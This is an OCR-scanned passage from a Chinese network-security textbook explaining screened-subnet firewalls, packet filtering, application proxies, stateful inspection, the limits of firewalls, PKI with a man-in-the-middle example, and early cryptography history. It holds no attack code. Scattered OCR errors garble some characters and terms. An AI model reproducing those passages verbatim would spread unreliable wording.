使 用 过 的 口令 , 偷 看 敏感 信息 等 ; 探听 者 能 完全 监视 何人 在 使 用 网 络 。 

对 于 周边 网 络 ,攻击 者 如 果 侵 入 周边 网 络 上 的 堡垒 主机 ,就 仅 能 探听 到 周边 网 络 上 的 通 
信 , 内 部 网 络 的 通信 仍 是 安全 的 。 

(2) 堡垒 主机 

在 屏蔽 子 网 体系 结构 中 ,用 户 把 堡 驹 主机 连接 到 周边 网 络 ; 这 台 主 机 便 是 接受 来 自 外 
部 连接 的 主要 入 口 。 例 如 ,对 于 进来 的 电子 邮件 (SMTP) 会 话 ,传送 电子 邮件 到 站 点 ; 对 于 
进来 的 FTP 连接 , 转 接 到 站 点 的 匿名 FTP 服务 器 ; 对 于 进来 的 域名 服务 (DNS) 站 点 查 

从 内 部 的 客户 端 到 在 Internet. 上 的 服务 器 的 出 站 服务 按 如 下 任 一 方法 处 理 : 在 外 部 和 
内 部 的 路 由 器 上 设置 数据 包 过 滤 来 允许 内 部 的 客户 端 直接 访问 外 部 的 服务 器 ; 设置 代理 服 
务 器 在 堡垒 主机 上 和 运行 来 允许 内 部 的 客户 端 间接 地 访问 外 部 的 服务 器 。 用 户 也 可 以 设置 数 
据 包 过 滤 来 允许 内 部 的 客户 端 在 堡垒 主机 上 同 代理 服务 器 交谈 ,反之 亦 然 。 但 是 禁止 内 部 
的 客户 端 与 外 部 网 络 之 间 直 接 通信 ( 即 拨号 人 网 方式 ) 。 

(3) 内 部 路 由 器 

内 部 路 由 器 有 时 被 称 为 阻塞 路 由 器 , 它 保 护 内 部 的 网 络 使 之 免 受 Internet 和 周边 网 络 
的 侵犯 。 

内 部 路 由 器 为 用 户 的 防火 墙 执行 大 部 分 的 数据 包 过 滤 工 作 。 它 允许 从 内 部 网 络 到 
Internet 的 有 选择 地 出 站 服务 。 

内 部 路 由 器 所 允许 的 在 堡垒 主机 和 用 户 的 内 部 网 络 之 间 服 务 可 以 不 同 于 内 部 路 由 器 所 
允许 的 在 Internet 和 用 户 的 内 部 网 络 之 间 的 服务 。 限 制 堡垒 主机 和 内 部 网 络 之 间 服 务 的 理 
由 是 减少 了 堡 琶 主机 被 攻破 时 对 内 部 网 络 的 危害 。 

(4) 外 部 路 由 器 

外 部 路 由 器 有 时 被 称 为 访问 路 由 器 ,保护 周边 网 络 和 内 部 网 络 免 受 来 自 Internet 的 侵 
犯 。 实 际 上 ,外 部 路 由 器 倾向 于 允许 几乎 任何 东西 从 周边 网 络 出 站 ,并 且 它 们 通常 只 执行 非 
常 少 的 数据 包 过 滤 。 保 护 内 部 机 器 的 数据 包 过 滤 规 则 在 内 部 路 由 器 和 外 部 路 由 器 上 基本 上 
应 该 是 一 样 的 ; 如 果 在 规则 中 有 允许 侵袭 者 访问 的 错误 ,错误 就 可 能 出 现在 两 个 路 由 器 上 。 

一 般 来 说 ,外 部 路 由 器 由 外 部 群 组 提供 (如 用 户 的 Internet 供应 商 ), 同 时 用 户 对 它 的 访 
问 被 限制 。 外 部 群 组 可 能 愿意 放 入 一 些 通用 型 数据 包 过 滤 规 则 来 维护 路 由 器 ,但 是 不 愿意 
使 用 维护 复杂 或 频繁 变化 的 规则 组 。 

外 部 路 由 器 能 有 效 地 执行 的 安全 任务 之 一 是 : 阻止 从 Internet 上 伪造 源 地 址 进来 的 任 
何 数据 包 。 这 样 的 数据 包 自 称 来 自 内 部 的 网 络 ,但 实际 上 是 来 自 Internet, 


创建 防火 墙 时 ,一 般 很 少 采用 单一 的 技术 ,通常 是 多 种 解决 不 同 问题 的 技术 的 组 合 。 这 种 
组 合 主要 取决 于 网 管 中 心 向 用 户 提供 什么 样 的 服务 ,以 及 网 管 中 心 能 接受 什么 等 级 风险 。 采 用 
哪 种 技术 主要 取决 于 经 费 \ 投 资 的 大 小 或 技术 人 员 的 技术 、 时 间 等 因素 。 一 般 有 以 下 几 种 形式 : 

。 使 用 多 堡垒 主 机 ; 

。 合 并 内 部 路 由 器 与 外 部 路 由 器 ; 

t 合并 堡垒 主机 与 外 部 路 由 器 ; 

。 合并 堡垒 主机 与 内 部 路 由 器 ; 

。 使 用 多 台 内 部 路 由 器 ; 

。 使 用 多 台 外 部 路 由 器 ; 

。 使 用 多 个 周边 网 络 ; 

。 使 用 双重 宿主 主机 与 屏蔽 子 网 。 

通常 建立 防火 墙 的 目的 在 于 保护 内 部 网 络 免 受 外 部 网 络 的 侵扰 ,但 内 部 网 络 中 每 个 用 
户 所 需要 的 服务 和 信息 经 常 是 不 一 样 的 ,它们 对 安全 保障 的 要 求 也 不 一 样 。 例 如 ,财务 部 分 
与 其 他 部 分 分 开 , 人 事 档案 部 分 与 办 公 管 理 分 开 等 。 还 需要 对 内 部 网 络 的 部 分 站 点 再 加 以 
保护 以 免 受 内 部 的 其 他 站 点 的 侵袭 , 既 在 同一 结构 的 两 个 部 分 之 间 , 或 者 在 同一 内 部 网 络 的 
两 个 不 同 组 织 结构 之 间 再 建立 防火 墙 , 也 就 是 内 部 防火 墙 。 许 多 用 于 建立 外 部 防火 墙 的 工 
具 与 技术 也 可 用 于 建立 内 部 防火 墙 。 


2.5 防火 墙 的 实现 技术 


传统 意义 上 的 防火 墙 技 术 分 为 包 过 滤 (Packet Filtering)、 应 用 代理 (Application 
Proxy) 和 状态 监视 (Stateful Inspection)3 种 技术 。 无 论 一 个 防火 墙 的 实现 过 程 多 么 复杂 ， 
归根 结 底 都 是 在 这 3 种 技术 的 基础 上 进行 功能 扩展 的 。 

l. 包 过 滤 技 术 

包 过 滤 技 术 是 最 早 使 用 的 一 种 防火 墙 技术 , 它 的 第 一 代 模 型 是 静态 包 过 滤 (Static 
Packet Filtering) ,使 用 包 过 滤 技 术 的 防火 墙 通常 工作 在 OSI 模型 中 的 网 络 层 (Network 
Layer) E, 后 来 发 展 更 新 的 动态 包 过 滤 (Dynamic Packet Filtering) 增加 了 传输 层 
(Transport Layer) , 简 而 言 之 , 包 过 滤 技 术 工 作 的 地 方 就 是 各 种 基于 TCP/IP 协议 的 数据 报 
文 进出 的 通道 , 它 把 这 两 层 作 为 数据 监控 的 对 象 ,对 每 个 数据 包 的 头 部 、 协 议 、 地 址 、 端 口 .类 
型 等 信息 进行 分 析 , 并 与 预先 设 定好 的 防火 墙 过 滤 规 则 (Filtering Rule) 进 行 核对 ,一 旦 发 现 
某 个 包 的 某 个 或 多 个 部 分 与 过 滤 规 则 匹配 并 且 条 件 为 “阻止 "时 ,这 个 包 就 会 被 丢弃 。 适 当 
的 设置 过 滤 规 则 可 以 让 防火 墙 工 作 变 得 更 安全 有 效 , 但 是 这 种 技术 只 能 根据 预 设 的 过 滤 规 
则 进行 判断 ,一 旦 出 现 预 设 之 外 的 有 害 数据 包 请 求 ,整个 防火 墙 的 保护 就 形同虚设 了 。 为 了 
解决 这 种 问题 ,人 们 对 包 过 滤 技 术 进 行 了 改进 ,这 种 改进 后 的 技术 称 为 动态 包 过 滤 。 动 态 包 
过 滤 功 能 在 保持 着 原 有 静态 包 过 滤 技 术 和 过 滤 规 则 的 基础 上 ,会 对 已 经 成 功 与 计算 机 连接 
的 报 文 传输 进行 跟踪 ,并 且 判 断 该 连接 发 送 的 数据 包 是 否 会 对 系统 构成 威胁 ,一 旦 触发 其 判 
断 机 制 ,防火 墙 就 会 自动 产生 新 的 临时 过 滤 规 则 或 把 已 经 存在 的 过 滤 规 则 进行 修改 ,从 而 阻 
止 该 有 害 数据 的 继续 传输 ,但 是 由 于 动态 包 过 滤 需 要 消耗 额外 的 资源 和 时 间 来 提取 数据 包 
内 容 进行 判断 处 理 , 所 以 与 静态 包 过 滤 相 比 , 它 会 降低 运行 效率 ,如 图 2.5 所 示 。 
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这 类 防火 墙 几 乎 是 与 路 由 器 同时 产生 的 , 它 是 根据 定义 好 的 过 滤 规 则 审查 每 个 数据 包 ， 
以 便 确 定 其 是 否 与 某 一 条 包 过 滤 规 则 匹配 。 过 滤 规 则 基于 数据 包 的 报头 信息 进行 制定 。 报 
头 信息 中 包括 IP 源 地 址 IP 目标 地 址 、 传 输 协议 (TCP、`UDP ICMP 4%) , TCP/UDP 目标 端 
O ICMP 消息 类 型 等 ,如 图 2.6 所 示 。 


图 2.6 第 二 代 动 态 包 过 滤 类 型 防火 墙 


这 类 防火 墙 采 用 动态 设置 包 过 滤 规 则 的 方法 ,避免 了 静态 包 过 滤 所 具有 的 问题 。 这 种 
技术 后 来 发 展 成 为 包 状态 监测 技术 。 采 用 这 种 技术 的 防火 墙 对 通过 其 建立 的 每 一 个 连接 都 
进行 跟踪 ,并且 根 据 需要 可 动态 地 在 过 滤 规 则 中 增加 或 更 新 条 目 。 

包 过 滤 方式 的 优点 是 不 用 改动 客户 机 和 主机 上 的 应 用 程序 ,因为 它 工 作 在 网 络 层 和 传 
输 层 , 与 应 用 层 无 关 。 其 缺点 是 过 滤 判 别 的 依据 只 是 网 络 层 和 传输 层 的 有 限 信息 ,因而 各 种 
安全 要 求 不 可 能 充分 满足 ; 在 许多 过 滤器 中 ,过 滤 规 则 的 数目 是 有 限制 的 , 且 随 着 规则 数目 
的 增加 ,性 能 会 受到 很 大 地 影响 ; 由 于 缺少 上 下 文 关 联 信息 ,不 能 有 效 地 过 滤 如 UDP、RPC 
(远程 过 程 调用 ) 一 类 的 协议 ; 另外 ,大 多 数 过 滤器 中 缺少 审计 和 报警 机 制 , 它 只 能 依据 包头 
信息 ,而 不 能 对 用 户 身份 进行 验证 ,很 容易 受到 “地 址 欺骗 型 "攻击 。 对 安全 管理 人 员 素 质 要 
求 高 ,建立 安全 规则 时 ,必须 对 协议 本 身 及 其 在 不 同 应 用 程序 中 的 作用 有 较 深入 的 理解 。 因 
此 ,过 滤器 通常 是 和 应 用 网 关 配 合 使 用 ,共同 组 成 防火 墙 系统 ,如 图 2.7 所 示 。 


图 2.7 第 三 代 动 态 包 过 滤 类 型 防火 墙 


基于 包 过 滤 技 术 的 防火 墙 , 其 缺点 是 : 包 过 滤 技 术 的 防火 墙 得 以 进行 正常 工作 的 一 切 
依据 都 在 于 过 滤 规 则 的 实施 ,但 是 偏 又 不 能 满足 建立 精细 规则 的 要 求 ( 规 则 数量 和 防火 墙 性 


能 成 反比 ) ,而 且 它 只 能 工作 于 网 络 层 和 传输 层 , 并 不 能 判断 高 级 协议 中 的 数据 是 否 有 害 ,但 
是 由 于 它 廉价 ,容易 实现 ,所 以 它 依 然 服 役 在 各 种 领域 ,在 技术 人 员 频 繁 的 设置 下 使 用 着 。 

2. 应 用 代理 技术 

由 于 包 过 滤 技 术 无 法 提供 完善 的 数据 保护 措施 ,而 且 一 些 特 殊 的 报 文 攻 击 仅仅 使 用 过 
滤 的 方法 并 不 能 消除 危害 (如 SYN 攻击 ICMP 洪水 等 ) ,因此 人 们 需要 一 种 更 全 面 的 防火 
墙 保护 技术 ,在 这 样 的 需求 背景 下 ,采用 应 用 代理 技术 的 防火 墙 诞生 了 。 代 理 服 务 器 作为 一 
个 为 用 户 保密 或 突破 访问 限制 的 数据 转发 通道 ,在 网 络 上 应 用 广泛 。 一 个 完整 的 代理 设备 
包含 一 个 服务 端 和 客户 端 ,服务 端 接收 来 自用 户 的 请 求 , 调 用 自身 的 客户 端 模拟 一 个 基于 用 
户 请 求 的 连接 到 目标 服务 器 ,再 把 目标 服务 器 返回 的 数据 转发 给 用 户 ,完成 一 次 代理 工作 过 
程 。 那 么 ,如 果 在 一 台 代 理 设备 的 服务 端 和 客户 端 之 间 连 接 一 个 过 滤 措 施 呢 ? 这 样 的 思想 
便 造 就 了 应 用 代理 防火 墙 ,这 种 防火 墙 实 际 上 就 是 一 台 小 型 的 带 有 数据 检测 过 滤 功 能 的 透 
明代 理 服务 器 (Transparent Proxy) ,但 是 它 并 不 是 单纯 的 在 一 个 代理 设备 中 嵌入 包 过 滤 技 
术 ,而 是 一 种 被 称 为 应 用 协议 分 析 (Application Protocol Analysis) 的 新 技术 。 

应 用 协议 分 析 技 术 工 作 在 OSI 模型 的 最 高 层 一 一 应 用 层 , 在 这 一 层 中 能 接触 到 的 所 有 
数据 都 是 最 终 形式 ,也 就 是 说 ,防火 墙 “看 到 ”的 数据 和 用 户 看 到 的 是 一 样 的 ,而 不 是 一 个 个 
带 着 地 址 端口 协议 等 原始 内 容 的 数据 包 , 因 而 它 可 以 实现 更 高 级 的 数据 检测 过 程 。 整 个 代 
理 防 火 墙 把 自身 映射 为 一 条 透明 线路 ,在 用 户 方面 和 外 界线 路 看 来 ,它们 之 间 的 连接 并 没有 
任何 阻碍 ,但 是 这 个 连接 的 数据 收发 实际 上 是 经 过 了 代理 防火 墙 转向 的 , 当 外 界 数据 进入 代 
理 防火 墙 的 客户 端 时 ,应 用 协议 分 析 模 块 便 根据 应 用 层 协议 处 理 这 个 数据 ,应 用 代理 技术 防 
火 墙 不 仅 能 根据 数据 层 提 供 的 信息 判断 数据 ,还 能 像 管理 员 分 析 服 务 器 日 志 那 样 分 析 内 容 
辨别 危害 。 由 于 工作 在 应 用 层 , 防 火 墙 还 可 以 实现 双向 限制 ,在 过 滤 外 部 网 络 有 害 数据 的 同 
时 也 监控 着 内 部 网 络 的 信息 ,管理 员 可 以 配置 防火 墙 实现 一 个 身份 验证 和 连接 时 限 的 功能 ， 
进一步 防止 内 部 网 络 信息 泄漏 的 隐患 。 最 后 ,由 于 代理 防火 墙 采取 代理 机 制 进行 工作 ,内 、 
外 部 网 络 之 间 的 通信 都 需 先 经 过 代理 服务 器 审核 ,通过 后 再 由 代理 服务 器 连接 ,根本 没有 给 
分 隔 在 内 、 外 部 网 络 两 边 的 计算 机 直接 会 话 的 机 会 ,可 以 避免 人 侵 者 使 用 数据 驱动 类 型 的 攻 
击 方式 (一 种 能 通过 包 过 滤 技 术 防 火 墙 规则 的 数据 报 文 ,但 是 当 它 进入 计算 机 处 理 后 , 却 变 
成 能 够 修改 系统 设置 和 用 户 数 据 的 恶意 代码 ) 渗 透 内 部 网 络 ,可 见 , 应 用 代理 技术 是 比 包 过 
滤 技 术 更 完善 的 防火 墙 技术 。 代 理 服 务 器 工作 模型 如 图 2. 8 所 示 。 
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在 代理 型 防火 墙 技术 的 发 展 过 程 中 , 它 也 经 历 了 两 个 不 同 的 版 本 , 即 第 一 代 应 用 网 关 型 
代理 防火 墙 和 第 二 代 自 适应 代理 型 防火 墙 。 

(1) 第 一 代 应 用 网 关 (Application Gateway) 型 代理 防火 墙 

这 类 防火 墙 是 通过 一 种 代理 技术 参与 到 一 个 TCP 连接 的 全 过 程 。 从 内 部 发 出 的 数据 
包 经 过 这 样 的 防火 墙 处 理 后 ,就 好 像 是 源 于 防火 墙 外 部 网 卡 一 样 ,从 而 可 以 达到 隐藏 内 部 网 
络 结构 的 作用 。 这 种 类 型 的 防火 墙 被 网 络 安全 专家 和 媒体 公认 为 是 最 安全 的 防火 墙 。 它 的 
核心 技术 就 是 代理 服务 器 技术 ,如 图 2.9 所 示 。 


图 2.9 第 一 代 应 用 网 关 型 代理 防火 墙 


(2) 第 二 代 自 适应 代理 (Adaptive proxy) 型 防火 墙 

它 是 近 几 年 才 得 到 广泛 应 用 的 一 种 新 防火 墙 类 型 。 它 可 以 结合 代理 型 防火 墙 的 安全 性 
和 包 过 滤 防 火 墙 的 高 速度 等 优点 ,在 毫 不 损失 安全 性 的 基础 之 上 将 代理 型 防火 墙 的 性 能 提 
高 10 倍 以 上 。 组 成 这 种 类 型 防火 墙 的 基本 要 素 有 两 个 : 自 适应 代理 服务 器 (Adaptive 
Proxy Server) 与 动态 包 过 滤器 (Dynamic Packet filter) ,如 图 2. 10 所 示 。 


图 2.10 第 二 代 自 适应 代理 型 防火 墙 


在 自 适应 代理 服务 器 与 动态 包 过 滤器 之 间 存 在 一 个 控制 通道 。 在 对 防火 墙 进行 配置 
时 ,用 户 仅仅 将 所 需要 的 服务 类 型 .安全 级 别 等 信息 通过 相应 代理 的 管理 界面 进行 设置 就 可 
以 了 。 然 后 , 自 适应 代理 就 可 以 根据 用 户 的 配置 信息 ,决定 是 使 用 代理 服务 从 应 用 层 代 理 请 
求 还 是 从 网 络 层 转发 包 。 如 果 是 后 者 , 它 将 动态 地 通知 包 过 滤器 增 减 过 滤 规 则 ,满足 用 户 对 
速度 和 安全 性 的 双重 要 求 。 

代理 型 防火 墙 的 最 突出 的 优点 就 是 安全 。 由 于 它 工 作 于 最 高 层 , 所 以 它 可 以 对 网 络 中 
任何 一 层 数据 通信 进行 筛选 保护 ,而 不 是 像 包 过 滤 那 样 , 只 是 对 网 络 层 的 数据 进行 过 滤 。 

另外 代理 型 防火 墙 采取 是 一 种 代理 机 制 , 它 可 以 为 每 一 种 应 用 服务 建立 一 个 专门 的 代 
理 , 所 以 内 、` 外 部 网 络 之 间 的 通信 不 是 直接 的 ,而 都 需 先 经 过 代理 服务 器 审核 ,通过 后 再 由 代 
理 服务 器 代为 连接 ,根本 没有 给 内 、 外 部 网 络 计算 机 任何 直接 会 话 的 机 会 ,从 而 避免 了 入 侵 
者 使 用 数据 驱动 类 型 的 攻击 方式 人 侵 内 部 网 络 。 

代理 防火 墙 的 最 大 缺点 就 是 速度 相对 比较 慢 , 当 用 户 对 内 、 外 部 网 络 网 关 的 吞吐 量 要 求 
比较 高 时 ,代理 防火 墙 就 会 成 为 内 、 外 部 网 络 之 间 的 瓶颈 。 那 是 因为 防火 墙 需要 为 不 同 的 网 


络 服务 建立 专门 的 代理 服务 ,在 自己 的 代理 程序 为 内 、 外 部 网 络 用 户 建立 连接 时 需要 时 间 ， 
所 以 给 系统 性 能 带 来 了 一 些 负面 影响 ,但 通常 不 会 很 明显 。 

3. 状态 监视 技术 

这 是 继 包 过 滤 技 术 和 应 用 代理 技术 后 发 展 的 防火 墙 技术 , 它 是 CheckPoint 技术 公司 在 
基于 包 过 滤 原理 的 动态 包 过 滤 技术 发 展 而 来 的 ,与 之 类 似 的 有 其 他 厂商 联合 发 展 的 深度 包 
检测 (Deep Packet Inspection) 技 术 。 这 种 防火 墙 技术 通过 一 种 被 称 为 状态 监视 的 模块 ,在 
不 影响 网 络 安全 正常 工作 的 前 提 下 采用 抽取 相关 数据 的 方法 对 网 络 通信 的 各 个 层次 实行 监 
测 ,并 根据 各 种 过 滤 规 则 做 出 安全 决策 。 

状态 监视 技术 在 保留 了 对 每 个 数据 包 的 头 部 、 协 议 、 地 址 、 端 口 类 型 等 信息 进行 分 析 的 
基础 上 ,进一步 发 展 了 会 话 过 滤 (Session Filtering) 功 能 ,在 每 个 连接 建立 时 ,防火 墙 会 为 这 
个 连接 构造 一 个 会 话 状态 ,里面 包含 了 这 个 连接 数据 包 的 所 有 信息 ,以 后 这 个 连接 都 基于 这 
个 状态 信息 进行 ,这 种 检测 能 对 每 个 数据 包 的 内 容 进行 监视 ,一 旦 建立 了 一 个 会 话 状态 , 则 
此 后 的 数据 传输 都 要 以 此 会 话 状 态 作 为 依据 ,例如 ,一 个 连接 的 数据 包 源 端口 是 8000 ,那么 
在 以 后 的 数据 传输 过 程 中 防火 墙 都 会 审核 这 个 数据 包 的 源 端 口 还 是 不 是 8000 ,否则 这 个 数 
据 包 就 被 拦截 ,而且 会 话 状 态 的 保留 是 有 时 间 限 制 的 ,在 超时 的 范围 内 如 果 没 有 再 进行 数据 
传输 ,这 个 会 话 状 态 就 会 被 丢弃 。 状 态 监 视 可 以 对 包 内 容 进行 分 析 , 从 而 摆脱 了 传统 防火 墙 
仅 局 限于 几 个 包头 部 信息 的 检测 弱点 ,而 且 这 种 防火 墙 不 必 开 放 过 多 端口 ,进一步 杜绝 了 可 
能 因为 开放 端口 过 多 而 带 来 的 安全 隐患 。 

由 于 状态 监视 技术 相当 于 结合 了 包 过 滤 技 术 和 应 用 代理 技术 ,但 是 由 于 实现 技术 复杂 ， 
在 实际 应 用 中 还 不 能 做 到 真正 的 完全 有 效 的 数据 安全 检测 。 


2.6 防火 墙 的 缺点 


安装 防火 墙 并 不 能 做 到 绝对 的 安全 ,防火 墙 也 有 以 下 的 缺点 。 

(1) 防火 墙 不 能 防范 内 部 攻击 。 内 部 攻击 是 任何 基于 隔离 的 防范 措施 都 无 能 为 力 的 。 

(2) 防火 墙 不 能 防范 不 通过 它 的 连接 。 防 火 墙 能 够 有 效 地 防止 通过 它 进 行 传输 信息 ， 
然而 不 能 防止 不 通过 它 而 传输 的 信息 。 

G) 防火 墙 不 能 防备 全 部 的 威胁 。 防 火 墙 被 用 来 防备 已 知 的 威胁 ,但 没有 一 个 防火 墙 
能 自动 防御 所 有 新 的 威胁 。 

(4) 防火 墙 不 能 防范 病毒 。 防 火 墙 不 能 防止 感染 了 病毒 的 软件 或 文件 的 传输 。 

(5) 防火 墙 不 能 防止 数据 驱动 式 攻 击 。 如 果 用 户 抓 来 一 个 程序 在 本 地 运行 ,那个 程序 
很 可 能 就 包含 一 段 恶意 的 代码 。 随 着 Java, JavaScript 和 ActiveX 控件 的 大 量 使 用 ,这 一 问 
题 变 得 更 加 突出 和 尖锐 。 
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随 着 Internet 的 普及 ,人 们 通过 因特网 进行 沟通 越 来 越 多 ,相应 的 通过 网 络 进行 商务 活 
动 即 电子 商务 也 得 到 了 广泛 地 发 展 。 电 子 商务 为 我 国企 业 开 拓 国 际 国内 市 场 、 利 用 好 国内 
外 各 种 资源 提供 了 一 个 千载难逢 的 机 会 。 电 子 商务 对 企业 来 说 真正 体现 了 平等 竞争 ,高效 
率 、 低 成 本 ,高 质量 的 优势 ,能 让 企业 在 激烈 的 市 场 竞 争 中 把 握 商 机 、 脱 颖 而 出 。 发 达 国家 已 
经 把 电子 商务 作为 国家 经 济 的 增长 重点 ,我国 的 有 关 部 门 也 正在 大 力 推进 我 国企 业 发 展 电 
子 商务 。 然 而 随 着 电子 商务 的 飞速 发 展 也 相应 的 引发 出 一 些 Internet. 安全 问题 。 
概括 起 来 ,进行 电子 交易 的 互联 网 用 户 所 面临 的 安全 问题 如 下 。 
。 保密 性 : 如 何 保证 电子 商务 中 涉及 大 量 保密 信息 在 公开 网 络 的 传输 过 程 中 不 被 
窃取 ; 
。 完整 性 : 如 何 保证 电子 商务 中 所 传输 的 交易 信息 不 被 中 途 算 改 及 通过 重复 发 送 进 
行 虚假 交易 s 
身份 认证 与 授权 : 在 电子 商务 的 交易 过 程 中 ,如 何 对 双方 进行 认证 ,以 保证 交易 双 
方 身份 的 正确 性 ; 
* 抗 抵赖 : 在 电子 商务 的 交易 完成 后 ,如 何 保证 交易 的 任何 一 方 无 法 否认 已 发 生 的 交 
易 。 这 些 安全 问题 将 在 很 大 程度 上 限制 电子 商务 的 进一步 发 展 ,因此 如 何 保证 
Internet. 上 信息 传输 的 安全 ,已 成 为 发 展 电子 商务 的 重要 环节 。 


3.1 PKI 概述 


为 解决 这 些 Internet 的 安全 问题 ,世界 各 国 对 其 进行 了 多 年 的 研究 ,初步 形成 了 一 套 完 
整 的 Internet. 安全 解决 方案 , 即 目前 被 广泛 采用 的 PKI (Public Key Infrastructure, 公 钥 基 
础 设施 ) 技术 , PKI 技术 采用 证 书 管理 公 钥 ,通过 第 三 方 的 可 信任 机 构 一 一 认证 中 心 
(Certificate Authority,CA), 把 用 户 的 公 钥 和 用 户 的 其 他 标识 信息 (如 名 称 、E-mail、 身 份 证 
号 等 ) 拥 绑 在 一 起 ,在 Internet. 上 验证 用 户 的 身份 。 目 前 ,通用 的 办 法 是 采用 基于 PKT 结构 
结合 数字 证 书 ,通过 把 要 传输 的 数字 信息 进行 加 密 , 保 证 信息 传输 的 保密 性 、 完 整 性 ,签名 保 
证 身份 的 真实 性 和 抗 抵赖 。 

下 面 来 看 一 个 例子 。 

Alice 和 Bob 准备 进行 如 下 的 秘密 通信 : 

Alice — Bob; 我 叫 Alice, 我 的 公开 密 钥 是 Ka. 你 选择 一 个 会 话 密 钥 K. JH Ka 加 密 后 
传送 给 我 ; 

Bob — Alice; 使 用 Ka 加 密会 话 密 钥 K; 


Alice > Bob; 使 用 K 加 密 传输 信息 ; 

Bob —> Alice; 使 用 K 加 密 传输 信息 。 

如 果 Mallory 是 Alice 和 Bob 通信 线路 上 的 一 个 攻击 者 ,并 且 能 够 截获 传输 的 所 有 信 
息 ,Mallory 将 会 截取 Alice 的 公开 密 钥 Ka 并 将 自己 的 公开 密 钥 Km 传送 给 Bob。 当 Bob 
用 Alice 的 公开 密 钥 ( 实 际 上 是 Mallory 的 公开 密 钥 ) 加 密会 话 密 钥 K 传送 给 Alice 时 ， 
Mallory 截取 它 ,并 用 他 的 私 钥 解密 获取 会 话 密 钥 人 ,然后 再 用 Alice 的 公开 密 钥 重新 加 密 
会 话 密 钥 K ,并 将 它 传 送 给 Alice, HF Mallory 截获 了 Alice 与 Bob 会 话 密 钥 氏 , 从 而 可 以 
获取 他 们 的 通信 内 容 并 且 不 被 发 现 。Mallory 的 这 种 攻击 称 为 中 间 人 攻击 。 

上 述 攻 击 的 成 功 本 质 上 在 于 Bob 收 到 的 Alice 的 公开 密 钥 可 能 是 攻击 者 假冒 的 , 即 无 
法 确定 获取 的 公开 密 钥 的 真实 身份 ,从 而 无 法 保证 信息 传输 的 保密 性 ,不 可 否认 性 、 数 据 交 
换 的 完整 性 。 

从 字面 上 去 理解 ,PKI 技术 就 是 利用 公共 密 钥 理论 和 技术 建立 的 提供 安全 服务 的 基础 
设施 。 所 谓 基 础 设施 ,就 是 在 某 个 大 环境 下 普遍 适用 的 系统 和 准则 。 在 现实 生活 中 如 电力 
系统 , 它 提供 的 服务 是 电能 ,可 以 把 电灯 电视. 电 吹 风机 等 看 成 是 电力 系统 这 个 基础 设施 的 
一 些 应 用 。 公 共 密 钥 基 础 设施 则 是 希望 从 技术 上 解决 网 上 身份 认证 ,信息 的 保密 性 ,信息 的 
完整 性 和 不 可 抵赖 性 等 安全 问题 ,为 网 络 应 用 提供 可 靠 的 安全 服务 。 

CA 机 构 , 又 称 为 证 书 授权 中 心 ,是 PKI 的 核心 。CA 是 受 一 个 或 多 个 用 户 信任 ,提供 
用 户 身份 验证 的 第 三 方 机 构 ,承担 公 钥 体系 中 公 钥 的 合法 性 检验 的 责任 。 

目前 ,我国 一 些 单位 和 部 门 都 已 建成 了 自己 的 一 套 CA 体系 。 其 中 较 有 影响 的 如 中 国 
电信 CA 安全 认证 体系 (CTCA)、 上 海 电子 商务 CA 认证 中 心 (SHECA) 和 中 国 金融 认证 中 
心 (CFCA) 等 。 

CTCA 于 1999 年 8 月 3 日 通过 中 国 密码 管理 委员 会 和 信息 产业 部 举行 的 联合 鉴定 ,并 
通过 国家 信息 产品 安全 认证 中 心 的 认证 ,获得 国家 信息 产品 安全 认证 中 心 颁发 的 认证 证 书 。 

1998 年 经 国家 密码 委员 会 批准 ,SHECA 成 为 全 国 第 一 个 CA 中 心 试点 单位 。1999 年 
1 月 经 上 海 市 政府 授权 ,成 为 上 海地 区 唯一 一 家 数字 证 书 服务 商 。1999 年 5 月 ,又 被 信息 产 
业 部 批准 为 全 国电 子 商务 综合 性 示范 工程 。SHECA 证 书 服务 已 经 遍布 全 国 ,建立 了 全 国 
性 的 SHECA 认证 体系 ,为 国内 电子 商务 参与 者 提供 安全 保证 和 安全 服务 。 

经 金融 系统 电子 商务 联络 与 研究 小 组 提议 ,由 人 民 银 行 和 各 家 商业 银行 联合 建立 金融 
部 门 的 安全 认证 体系 。 目 前 金融 认证 中 心 已 开始 投入 运行 ,向 各 种 用 户 发 放 证 书 。 它 是 面 
向 全 国 的 ,金融 系统 联合 共 建 的 ,统一 的 认证 中 心 。 
国外 的 一 些 大 的 网 络 安全 公司 也 纷纷 推出 一 系列 的 基于 PKI 的 网 络 安全 产品 ,如 美国 
的 Verisign、IBM、Sun、 加 拿 大 的 Entrust 等 安全 产品 供应 商 为 用 户 提供 了 一 系列 的 客户 端 
和 服务 器 端的 安全 产品 ,为 电子 商务 的 发 展 及 政府 办 公 网 络 .EDI 等 提供 了 安全 保证 。 


3.2 密码 学 基础 回顾 


密码 学 (Cryptology) 是 一 门 古老 而 又 年 轻 的 科学 。 密 码 的 历史 十 分 悠久 ,大 约 在 4000 
年 以 前 ,在 古 埃及 的 尼罗河 畔 ,一 位 书写 者 在 贵族 的 基 碑 上 书写 铭文 时 有 意 用 加 以 变形 的 象 
形 文字 而 不 是 普通 的 象形 文字 来 写 铭文 ,从 而 揭 开 了 有 文字 记载 的 密码 史 。 公 元 前 5 世纪 ， 
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古 斯 巴 达 人 使 用 了 一 种 叫做 “天 书 ” 的 器 械 ,这 是 人 类 历史 上 最 早 使 用 的 密码 器 械 。“ 天 书 ” 
是 一 根 用 羊皮 纸 条 紧 紧 缠绕 的 木 棍 ,书写 者 自 上 而 下 把 文字 写 在 羊皮 纸 条 上 ,然后 把 羊皮 纸 
条 解 开 送出 。 这 些 不 连接 的 文字 看 起 来 毫 无 意义 ,除非 把 羊皮 纸 条 重新 缠 在 一 根 直径 和 原 
木 棍 相同 的 木 棍 上 ,这 样 字 就 一 圈 圈 跳出 来 。 公 元 前 4 世纪 前 后 ,希腊 著名 作家 艾 奈 阿 斯 在 
其 著作 《城市 防卫 论 ) 中 就 曾 提 到 一 种 被 称 为 “ 艾 奈 阿 斯 强 结 ”的 密码 。 它 的 作法 是 从 绳子 的 
一 端 开始 ,每 隔 一 段 距离 打 一 个 绳 结 ,而 强 结 之 间距 离 不 等 ,不 同 的 距离 表达 不 同 的 字母 。 
按 此 规定 把 绳子 上 所 有 绳 结 的 距离 按 顺 序 记 录 下 来 ,并 换 成 字母 ,就 可 理解 它 所 传递 的 信 
息 。 第 一 次 世界 大 战 是 世界 密码 史上 的 第 一 个 转折 点 。 在 此 之 前 ,密码 研究 还 只 是 一 个 小 
